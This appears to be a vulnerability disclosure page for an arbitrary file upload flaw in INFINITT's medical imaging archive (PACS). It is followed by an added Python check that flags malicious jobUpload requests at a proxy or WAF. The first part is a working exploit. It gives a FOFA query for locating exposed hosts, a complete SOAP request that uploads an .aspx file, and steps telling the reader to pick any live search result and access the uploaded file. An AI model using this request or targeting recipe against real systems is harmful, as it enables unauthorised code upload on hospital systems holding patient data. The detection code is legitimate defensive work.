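Vulnerability description:
INFINITT is a company specializing in the development of medical imaging systems, founded in 1994. The INFINITT picture archiving and communication system (PACS) has an arbitrary file upload vulnerability in INFINITT_PACS_WebJobUpload.
FOFA query: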
(icon_hash="1474455751" || icon_hash="702238928")
PoC:
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 407
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>123</vcode>
<subFolder></subFolder>
<fileName>test.aspx</fileName>
<bufValue>NjY2</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>
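Vulnerability reproduction:
Open FOFA and search with the query (icon_hash="1474455751" || icon_hash="702238928")
Pick any result; after a successful upload, the path is returned in the response
Access the file that was just uploaded
Success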
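
A detection check for the jobUpload request shown above, for use on request bodies captured at a reverse proxy or WAF. This is an added example, not code from the original page or from INFINITT; the function names, the extension list and the constructed sample bodies are assumptions.

```python
import base64
import ntpath
import xml.etree.ElementTree as ET

ENDPOINT = "/webservices/webjobupload.asmx"  # request path from this page, lower-cased
NS = {"soap": "http://schemas.xmlsoap.org/soap/envelope/", "r": "http://rainier"}
# Assumption: extensions an IIS/ASP.NET host may execute or treat as configuration.
RISKY_EXT = {".aspx", ".ashx", ".asmx", ".asp", ".asa", ".cer", ".cshtml", ".config"}

def build_body(file_name, buf_value, sub_folder=""):
    """Constructed sample input: a jobUpload envelope using the page's element names."""
    return (f'<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="{NS["soap"]}">'
            f'<soap:Body><jobUpload xmlns="{NS["r"]}"><vcode>123</vcode>'
            f'<subFolder>{sub_folder}</subFolder><fileName>{file_name}</fileName>'
            f'<bufValue>{buf_value}</bufValue></jobUpload></soap:Body></soap:Envelope>').encode()

def inspect_job_upload(method, path, body):
    """Return findings for one captured request; an empty list means nothing flagged."""
    if method.upper() != "POST" or path.split("?")[0].lower() != ENDPOINT:
        return []
    if b"<!doctype" in body.lower():  # do not hand DTDs to the XML parser
        return ["DOCTYPE present in SOAP body"]
    try:
        job = ET.fromstring(body).find("soap:Body/r:jobUpload", NS)
    except ET.ParseError:
        return ["unparseable SOAP body"]
    if job is None:
        return []
    name = job.findtext("r:fileName", "", NS).strip()
    folder = job.findtext("r:subFolder", "", NS).strip()
    b64 = "".join(job.findtext("r:bufValue", "", NS).split())
    findings = []
    # Windows drops trailing dots and spaces, so strip them before reading the extension.
    ext = ntpath.splitext(ntpath.basename(name).rstrip(". ").lower())[1]
    if ext in RISKY_EXT:
        findings.append(f"server-executable extension {ext}")
    if ntpath.basename(name) != name or ".." in folder or ntpath.isabs(folder):
        findings.append("path traversal in fileName or subFolder")
    try:
        payload = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        payload = b""
        findings.append("bufValue is not valid base64")
    if b"<%" in payload or b"runat=" in payload.lower():
        findings.append("ASP.NET markup in decoded bufValue")
    return findings

if __name__ == "__main__":
    print(inspect_job_upload("POST", "/webservices/WebJobUpload.asmx", build_body("test.aspx", "NjY2")))
```

Any non-empty result for this endpoint is worth alerting on, together with a later GET for the same file name from the same client.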